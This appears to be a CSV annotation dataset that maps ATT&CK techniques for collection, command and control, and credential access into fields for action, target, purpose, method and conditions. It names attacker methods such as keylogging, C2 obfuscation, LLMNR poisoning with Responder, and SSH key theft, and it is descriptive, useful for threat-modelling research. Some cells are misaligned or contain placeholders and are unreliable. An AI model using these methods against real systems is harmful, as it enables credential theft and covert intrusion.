0,0,1,2,tactic,technique,Id,action_what,action_where,where_attribute,when,when_condition,when_object,why_state,why_what,why_where,how,how_what,how_where,precondition,postcondition,alternative_technique,
,1,,296,collection,input capture,t1056,log/capture/intercept,user input/keystroke,,,,,"acquire/obtain/capture,transmit-credentials; access new opportunities;inspect- user input field interception;",,,"performing a uac prompt , wrapping the windows default credential provider , keylogging",,,keylogging-enable,credential-captured,credential-captured,
1,,,297,collection,input capture,t1056,install/use,keylogger,,,,,capture and transmit credentials of users;  maintain network access,,,,,,,credential-captured; vlaid account; external remote services ,credential-captured; vlaid account; external remote services ,
1,,,297,collection,input capture,t1056,install-code ,portals/ vpn login,externally facing ,,,,capture and transmit credentials of users;  maintain network access,,,,,,portal-externally-reachable/vpn-externally-reachable ,credential-captured; vlaid account; external remote services ,credential-captured; vlaid account; external remote services ,
,1,,157,collection,data staged,t1074,stage/keep/combine/copy/store,data/file,compressed data/encrypted data,,,,Exfiltrate data/file,Exfiltrate,data/file,"use cmd, use bash, copy data, remote copy, rcp, ",,,<List all techniques that allow for data collection> AND location-access,new compressed/encrypted data/files stored in disk,new compressed/encrypted data/files stored in disk,
,1,,567,collection,screen capture,t1113 ,take/capture , screen/screen-capture/screenshot,,,,,gather information; capture screenshots,,,,use,native command screencapture/xwd,command-access,screen-captured,screen-captured,
,1,,197,collection,email collection,t1114,acquire/discover/collect,email-data/email-address,,machine is-a compromise; adversary has-a credential,,,"collect sensitive information;interact with exchange server, acquire information",,,Outlook storage; cache files .pst and .ost;access-webmail application/outlook web access,,,"email-servcer-access, credential-access",spear-phishing ,mailserver-access or emailclient-access,
,1,,747,collection,video capture,t1125,capture/write/record,video recording/image/video/image file/webcam,,,,,gather information,,,use malware/script,use,malware/script/peripheral device/integrated camera/webcam/application/video call service,device-access/webcam-access,vedio-captured,vedio-captured,
,1,,344,collection,man in the browser,t1185,inject-software/inject-code,browser,,,"require,high-intregity","sedebugprivilege,process","change content, modify behavior, and intercept information; inherit cookies ,  inherit  http sessions ,  inherit ssl client certificates , use the browser as a way to pivot into an authenticated intranet , redirect any http and https traffic","change, modify, intercept, inherit, redirect","content,behavior,information,cookies/http sessions/ssl client certificates, http/https traffic","setting up an http proxy, use-security vulnerability/browser functionality",use,security vulnerability/browser functionality,browser has-a SeDebugPrivilege; Process is-a high intigrity,,,
,,,344,collection,man in the browser,t1185,redirect,traffic,,browser has-a SeDebugPrivilege; Process is-a high intigrity,"require,high-intregity","sedebugprivilege,process","change content, modify behavior, and intercept information; inherit cookies ,  inherit  http sessions ,  inherit ssl client certificates , use the browser as a way to pivot into an authenticated intranet , redirect any http and https traffic","change, modify, intercept, inherit, redirect","content,behavior,information,cookies/http sessions/ssl client certificates, http/https traffic",set-http-proxy browser,set-http-proxy,browser,,,,
,,,344,collection,man in the browser,t1185,intercept-information ,browser,,,"require,high-intregity","sedebugprivilege,process","change content, modify behavior, and intercept information; inherit cookies ,  inherit  http sessions ,  inherit ssl client certificates , use the browser as a way to pivot into an authenticated intranet , redirect any http and https traffic","change, modify, intercept, inherit, redirect","content,behavior,information,cookies/http sessions/ssl client certificates, http/https traffic","setting up an http proxy, use-security vulnerability/browser functionality",use,security vulnerability/browser functionality,browser has-a SeDebugPrivilege; Process is-a high intigrity,,,
,,,344,collection,man in the browser,t1185,modify-behavior,browser,,,"require,high-intregity","sedebugprivilege,process","change content, modify behavior, and intercept information; inherit cookies ,  inherit  http sessions ,  inherit ssl client certificates , use the browser as a way to pivot into an authenticated intranet , redirect any http and https traffic","change, modify, intercept, inherit, redirect","content,behavior,information,cookies/http sessions/ssl client certificates, http/https traffic","setting up an http proxy, use-security vulnerability/browser functionality",use,security vulnerability/browser functionality,browser has-a SeDebugPrivilege; Process is-a high intigrity,,,
,,,344,collection,man in the browser,t1185,change-content,browser,,,"require,high-intregity","sedebugprivilege,process","change content, modify behavior, and intercept information; inherit cookies ,  inherit  http sessions ,  inherit ssl client certificates , use the browser as a way to pivot into an authenticated intranet , redirect any http and https traffic","change, modify, intercept, inherit, redirect","content,behavior,information,cookies/http sessions/ssl client certificates, http/https traffic","setting up an http proxy, use-security vulnerability/browser functionality",use,security vulnerability/browser functionality,browser has-a SeDebugPrivilege; Process is-a high intigrity,,,
,1,,152,collection ,data from local system,t1005,search,file system,,,compromise,computer,<what> find <\what> <where> files <\where> of interest  <what> gather <\what> <where> information <\where>;exfiltration,"find  ,  gather/collect","files  ,  information","command-line interface, such as cmd",,,,,,Automated Collection; Command-Line Interface
,1,,154,collection ,data from removable media,t1025,search/access/read/mount/collect-data,removable-media,sensitive,,,,"exfiltration;<what> find <\what> <where>files of interest.<where> interactive command shells <\where> may be in<what>  use <\what>, and <attribute> common functionality <\attribute> within <where> cmd <\where> may be <what> used <\what>to <why> gather information","find  ,   use  ,  used","files of interest.<where> interactive command shells  ,  cmd","removable media (optical disk drive, usb memory, etc.)",,,"system-compromized
removable-media-enabled
removable-media-connected",,removable-media-read ,automated collection
,1,,153,collection ,data from network shared drive,t1039,search/access/read/mount/collect-data,network-share/network-share-drive,sensitive,,compromised,computers,exfiltration;gather information;<what> find <\what> <where>files <\where>;collect data,"find,collect","files,sensitive data","remote systems via shared network drives (host shared directory, network file server, etc.);use interactive command shells/cmd",use,"interactive command shells, cmd",,,,
,1,,86,collection ,clipboard data,t1115,collect/access/read,clipboard data,stored in the windows clipboard,,,,<what> grab <\what> <where> clipboard contents <\where>,grab,clipboard contents,,use,pbpaste/windows api,information-copied,exfiltration ,cliboard-access,
,1,,52,collection ,automated collection,t1119,collect/search/copy/move/identify,data/information/file type/location/name,,<condition> established <\condition> within a <object> system or network <\object>,established,system or network,gather information,,,,use,"Scripting, Fiel and Directory Discovery/Remote file Copy",file-access/directory-access,file-collected/data-collected,file-collected/data-collected,
,1,,49,collection ,audio capture,t1123 , listen/capture/read/open, audio-recordings/audio-device ,,,,,gather information,,,, use/levarage,peripheral devices/applications;conversations/malware/scripts / microphones/webcams;voice and video call services ,device-access/webcam-access,,audio-device-access/open/read,
,1,,151,collection ,data from information repositories,t1213,leverage/use,information repositories,"policies, procedures, and standardsphysical / logical network diagrams /system architecture diagrams/ technical system documentation testing / development credentialswork / project schedules source code snippets links to network shares and other internal resourcesspecific common information repositories include:microsoft sharepoint  /atlassian confluence",,,,<what> mine <\what> valuable <where> information <\where>,mine,information,,,,information-repository-access,data-collected,data-collected,
,1,1,156,command and control,data obfuscation,t1001,hide,command and control (c2) communications,,,,,difficult to discover or decipher ; make the communication less conspicuous ; <what> hide <\what><where> commands <\where> from being seen,make difficult; make communication; hide,disvover command; less conspicuous; command,add junck data to protocol traffic; use steganography; <what>  commingling <\what> legitimate <where> traffic <\where> with c2 communications traffic; use  non-standard data encoding system,add-junk-data; use; commingle-legitimate-traffic; use,protocol traffic; steganography; C2 traffic; non-standard data encoding system,C2-Channel-established,,data-flow-uncommon,
,1,1,156,command and control,data obfuscation,t1001,add-junk-data,protocol traffic,,,,,difficult to discover or decipher ; make the communication less conspicuous ; <what> hide <\what><where> commands <\where> from being seen,make difficult; make communication; hide,disvover command; less conspicuous; command,,,,System-compromised,,data-flow-uncommon,
,1,1,156,command and control,data obfuscation,t1001,commingle-legitimate-traffic,C2 traffic,,,,,difficult to discover or decipher ; make the communication less conspicuous ; <what> hide <\what><where> commands <\where> from being seen,make difficult; make communication; hide,disvover command; less conspicuous; command,,,,System-compromised,,data-flow-uncommon,
,1,1,156,command and control,data obfuscation,t1001,use,steganography/non-standard data encoding system,modified base64 encoding,,,,difficult to discover or decipher ; make the communication less conspicuous ; <what> hide <\what><where> commands <\where> from being seen,make difficult; make communication; hide,disvover command; less conspicuous; command,,,,System-compromised,,data-flow-uncommon,
,1,,238,command and control,fallback channels,t1008,use,fallback/communication channels,alternate,<object>primary channel <\object>is <condition> compromised<\condition> or <condition>inaccessible <\condition>,compromised,primary channel,<what>maintain <\what>  <attribute>reliable <\attribute><where>command and control <\where> and to <why> <what> avoid <\what> <where> data transfer <\where> thresholds,"maintain  ,  avoid","command and control  ,  data transfer",,,,primary-channel-inaccessible,,C2-channel-switched,
,1,,147,command and control,custom cryptographic protocol,t1024,encrypt/encode,C2 traffic,,,,,<what> hide <\what> <where> command and control traffic <\where>;lead to unintentional errors,hide,command and control traffic,use custom cryptographic protocol/custom cryptographic algorithm,use,custom cryptographic protocol/custom cryptographic algorithm; XORing the plaintext with fixed key,C2-Channel-established,,traffic-encrypted,
,1,,380,command and control,multiband communication,t1026,split,communication/network traffic/C2 traffic,,,,,"<what>bypass<\what> certain <where>firewall restrictions<\where> , <what>avoid<\what> <where>data threshold alerts<\where> on any one communication","bypass , avoid","firewall restrictions , data threshold alerts",use different protocol,use,different protocol,C2-Channel-established,,different-protocol-used,
,1,,663,command and control,standard cryptographic protocol,t1032 ,encrypt/encode,C2 traffic/c2 communication,,,,,conceal <where>command and control traffic<\where>,conceal,command and control traffic,use known encryption algorithm;employ known encryption algorithm,use/employ,encryption algorithm,C2-Channel-established,,traffic-encrypted,
,1,,97,command and control,uncommonly used port,t1065 ,conduct/communicate/send,c2 communication/C2 traffic,,that have been <condition>improperly configured<\condition>,improperly configured,,<what>bypass<\what> <where>proxies<\where> and <where>firewalls<\where>,bypass,"proxies , firewalls",using uncommonly used port,use,uncommonly used port,System-compromised,,uncommon-port-used,
,1,,660,command and control,standard application layer protocol,t1071 ,blend-command/ embed-command/ communicate/send,traffic/ c2 traffic,existing,machine is-a compromised,,,avoid detection,,,"using a common, standardized application layer protocol ,  using  http ,  using  https ,  using  smtp ,  using  dns",use,common/standardized application layer protocol/ http/https /smtp / dns,C2-Channel-established,,application-layer-protocol-used,
,1,,382,command and control,multilayer encryption,t1079 ,perform/communicate/send,c2 communication/c2 traffic,,machine is-a compromised,,,,,,"using multiple layers of encryption , tunneling a custom encryption scheme within a protocol encryption scheme",,,C2-Channel-established,,traffic-encrypted,
,,,113,command and control,connection proxy,t1090,perform/communicate/send,c2 communication/c2 traffic,,machine is-a compromised,,,<what> manage <\what><where>command and control communications<\where> . <what> reduce <\what> the number of simultaneous <attribute> outbound <\attribute> <where> network connections<\where> . <what> provide resiliency<\what>  in the face of <where> connection loss<\where>  ride over existing trusted communications paths between victims avoid suspicion,"manage  ,  reduce  ,  provide resiliency","command and control communications ,  network connections ,  connection loss","using proxy/using port redirection/using HTRAN,ZXProxy,ZXPortMap",use,proxy/port redirection/HTRAN/ZXProxy/ZXPortMsp,C2-Channel-established,,traffic-redirected(??),
,1,,99,command and control,communication through removable media,t1092,perform/communicate/send,c2 communication/c2 traffic,,<object> systems <\object> would need to be <condition> compromised <\condition>,compromised; direct access,systems,transfer commands from system to system,transfer,command,removable media;lateral movement  by replication through removable media,,,System-compromised; removable-media-enabled;autorun-enabled,replication through removable media,command-transferred,
,1,,146,command and control,custom command and control protocol,t1094,communicate/send/encapsulate,c2 communication/c2 traffic,,,,,,,,using custom command and control protocol,use,custom command and control protocol,C2-Channel-established,,non-standard-protocol-used,
,1,,664,command and control,standard non-application layer protocol,t1095,perform/communicate/send,c2 communication/c2 traffic,,,,,hide communications,hide,c2 communication,"use of a standard non-application layer protocol , use of network layer protocols, such as the internet control message protocol (icmp) , , transport layer protocols, such as the user datagram protocol (udp)  , ,session layer protocols, such as socket sec",use,standard non-application layer protocol/internet control message protocol (icmp)/transport layer protocol/user datagram protocol/session layer protocol,C2-Channel-established,,non-application-layer-protocol-used,
,1,,765,command and control,web service,t1102 ,use, web service/common service,"existing/legitimate external,offered by google or twitter",once <condition>infected<\condition>,infected/compromised,system,relaying commands to a compromised system;hide in expected noise,,,"post content, known as a dead drop resolver on web services with embedded (and often obfuscated/encoded) domains or ip addresses",,,System-compromised,,??,
,1,,383,command and control,Multi-Stage Channels,t1104,"use
create,obfuscate,call back, upload","muli-stage channel
command and control channel,command and control server, Remote access tool","multi stage,first stage, second stage",,,,"collect basic host information, update tools, and upload additional files; 
redirect the host to the second-stage command and control server","collect, update, upload, redirect","host information, tool, file, host ",use remote access tool;use multi stage channel,use,remote access tool;multi stage channel,,,,
,1,,541,command and control,remote file copy,t1105 ,copy,file,,C2-Channel is-a established,,,stage adversary tools or other files;bring tools into the victim network,"stage, copy","adversary tool, file ","command and control channel , alternate protocols with another tool , ftp; mac and linux with native tools , scp , rsync , sftp  ;remote execution using inherent file sharing protocols such as file sharing over smb , authenticated connections with windows admin shares , remote desktop protocol",,,"C2-Channel-established,File-identified",Windows admin share/Remote desktop protocol,File-written,
,1,,149,command and control,data encoding,t1132,encode,c2 communication/C2 traffic,,,,,hide C2 command,,,using standard data encoding system/ASCII/Unicode/Base64/MIME/UTF-8/ binary-to-text/character encoding system,use,standard data encoding system/ASCII/Unicode/Base64/MIME/UTF-8/ binary-to-text/character encoding system/gzip,encoding-system-available,,data-encoded,
1,,,178,command and control,domain fronting,t1172,obfuscate/hide,destination,,,,,domain fronting/hiding/disguise,hiding/disguise,destination ,"using TLS, HTTP, TLS header SNI field are not equal to HTTP header",use,TLS and HTTP ,"SNI-field-in-TLS-and-HTTP-not-equal
",,traffic-redirected(??),
,1,,381,command and control,multi-hop proxy,t1188,chain/link,proxy,multiple,,,,<what> disguise <\what> the <where> source <\where> of <attribute> malicious traffic <\attribute>;<what> identify<\what> its <where>source <\where>,disguise/identify,source,using several proxies,,,proxy-multiple,,traffic-redirected(??),
,1,,534,command and control,remote access tools,t1219 ,use,desktop support/remote access software,"Team Viewer,Go2Assist, LogMein, AmmyyAdmin","used as <object>legitimate technical support software<\object>, and may be <condition>whitelisted<\condition> within a target environment",whitelisted,legitimate technical support software,"establish an interactive command and control channel , redundant access , establish an interactive remote desktop session , establish a reverse connection , back-connect to a service or adversary controlled system",,,"using desktop support and remote access software , team viewer , go2assist , logmein , ammyyadmin",,,remote-access-software-whitlisted,Redundant Access,??,
,1,,179,command and control,domain generation algorithms,t1483,employ/use,domain generation algorithms (dgas)/DGA,,,,,dynamically identify a destination for command and control traffic,,,,,,System-compromised,Fallback Channels,multiple-domain-checked,
,1,,98,command and control ,commonly used port,t1043 , communicate/send,c2 communication/C2 traffic,,,,,"bypass firewall/nds,blend with normal traffic activity,avoid detailed inspection",,,using  tcp:80 (http)/ tcp:443 (https)/tcp:25 (smtp)/tcp/udp:53 (dns)/tcp/udp:135 (rpc)/tcp/udp:22 (ssh)/tcp/udp:3389 (rdp)  ,use,tcp:80 (http)/ tcp:443 (https)/tcp:25 (smtp)/tcp/udp:53 (dns)/tcp/udp:135 (rpc)/tcp/udp:22 (ssh)/tcp/udp:3389 (rdp),System-compromised,,common-port-used,
,,,735,credential access,two-factor authentication interception,t1111,use,keylogger,,<condition><object>smart card<\object> is used for two-factor authentication (2fa) <\condition> ,<object>smart card<\object> is used for two-factor authentication ,smart card,"<what>intercept<\what> and <what>bypass<\what> these <where>security mechanisms<\where> , <what>gain access<\what> to <where>systems<\where>, <where>services<\where>, and <where>network resources<\where> , <what>obtain<\what> the <where>password<\where> a","intercept , bypass , gain access , obtain","security mechanisms , systems , services , network resources , password",,,,,,,
,,,736,credential access,two-factor authentication interception,t1111,intercept/obtain,password  ,,,,,,,,,using,infected system,,,,
,,,737,credential access,two-factor authentication interception,t1111,bypass,security mechanism,,infected system,,,,,,,,,,,,
,,,738,credential access,two-factor authentication interception,t1111,gain access,system/service/network resource,,,,,,,,,,,credential-protected,credential-exposed,credential-exposed,
,,,739,credential access,two-factor authentication interception,t1111,connect,network resource,,,,,<what>proxy<\what> the <where>authentication<\where> with the inserted hardware token,proxy,authentication,<what>using<\what> the <where>infected system<\where>,use,keylogger,credential-protected,credential-exposed,credential-exposed,
,,,740,credential access,two-factor authentication interception,t1111,proxy authenticate,hardware token,,,,,,,,,,,credential-protected,credential-exposed,credential-exposed,
,,,741,credential access,two-factor authentication interception,t1111,employ,keylogger,,,,,"provide temporary access , <what>predict<\what> future <where>authentication values<\where>",,,,,,,,,
,,,742,credential access,two-factor authentication interception,t1111,capture,token input,,,,,"provide temporary access , <what>predict<\what> future <where>authentication values<\where>",predict,authentication values,using keylogger,,,private-key-unknown,private-key-collected,private-key-collected,
,1,,298,credential access,input prompt,t1141,mimic/use,input prompt,,,,,<what>prompt<\what> <where>users<\where> for credentials;<what>collect<\what> <where>credentials<\where> via various languages such as applescript[2][3] and powershell,"prompt,collect","users,credential","seemingly legitimate prompt , fake installer requiring additional access , fake malware removal suite",,,,,,
,,,299,credential access,input prompt,t1141,prompt-user,credential,,,,,,,,,,,,,,
,,,323,credential access,keychain,t1142,access,keychain,,adversary <condition>knows the <object>credentials<\object> for the login keychain<\condition>,knows the <object>credentials<\object> for the login keychain,credentials,collect credential,collect,credentials,using security command line utility,,,,,,
,,,470,credential access,private keys,t1145,gather,private key,,system is compromised,,,"use in authenticating to remote services like ssh , use in decrypting other collected files such as email",,,,,,,,,
,,,471,credential access,private keys,t1145,authenticate,remote service/ssh,,,,,,,,,,,private-key-password-protected,private-key-password-exposed,private-key-password-exposed,
,,,472,credential access,private keys,t1145,decrypt,file,,,,,,,,,,,,,,
,,,473,credential access,private keys,t1145,look/search,directories/file extension,"~/.ssh , c:\users(username).ssh\",,,,,,,,,,credential-protected,credential-exposed,credential-exposed,
,,,474,credential access,private keys,t1145,use,input capture,,,,,to capture privatekey password,,,keylogging,,,,,,
,,,475,credential access,private keys,t1145,attempt brute force,key,,,,,,,,,responding,llmnr (udp 5355)/nbt-ns (udp 137) traffic,destination-benign,destination-adversary,destination-adversary,
,,,581,Credential Access,Securityd Memory,T1167,scan,securityd memory  ,,adversary can <condition>obtain <object>root access<\object><\condition>,obtain <object>root access<\object>,root access,<what>find<\what> the correct sequence of <where>keys<where>,find,keys,,,,,,,
,,,582,Credential Access,Securityd Memory,t1167,find,key,correct sequence,,,,,,,,,,,,,
,,,333,credential access,llmnr/nbt-ns poisoning and relay,t1171,spoof,authoritative source,,,,,name resolution; <what>obtain<\what> the plaintext <where>passwords<\where>,,,<what>responding<\what> to <where>llmnr (udp 5355)/nbt-ns (udp 137) traffic<\where>,,,,,,
,,,334,credential access,llmnr/nbt-ns poisoning and relay,t1171,"send , collect , crack","username , ntlmv2 hash  , hash",,<object>requested host<\object> belongs to a resource that <condition>requires identification/authentication<\condition> ,requires identification/authentication,requested host,<what>obtain<\what> the plaintext <where>passwords<\where>,obtain,passwords,"tools that monitor the ports for traffic , network sniffing , brute force",,,,,,
,,,335,credential access,llmnr/nbt-ns poisoning and relay,t1171,intercept,ntlmv2 hash,,access to authentication path,,,,,,,use,tool/responder/metasploit/nbnspoof,destination-benign,destination-adversary,destination-adversary,
,,,336,credential access,llmnr/nbt-ns poisoning and relay,t1171,relay,ntlmv2 hash,,,,,<what>access<\what> and <what>execute<\what> <where>code<\where>,"access , execute",code,,,,credential-protected,credential-exposed,credential-exposed,
,,,337,credential access,llmnr/nbt-ns poisoning and relay,t1171,use,tool/responder/metasploit/nbnspoof,,,,,<what>poison<\what> <where>name services<\where>,poison,name services,,using,service tickets,credential-protected,credential-exposed,credential-exposed,
,,,338,credential access,llmnr/nbt-ns poisoning and relay,t1171,poison,name service,,,,,,,,using tool/responder/metasploit/nbnspoof,,,credential-protected,credential-exposed,credential-exposed,
,,,445,credential access,password filter dll,t1174,register,password filter DLL,malicious,<condition>filters must receive <object>plain-text credentials<\object><\condition> from the lsa,filters must receive <object>plain-text credentials<\object>,plain-text credentials,<what>harvest<\what> <where>credentials<\where> from local computers and/or entire domains,harvest,credentials,,,,,,,
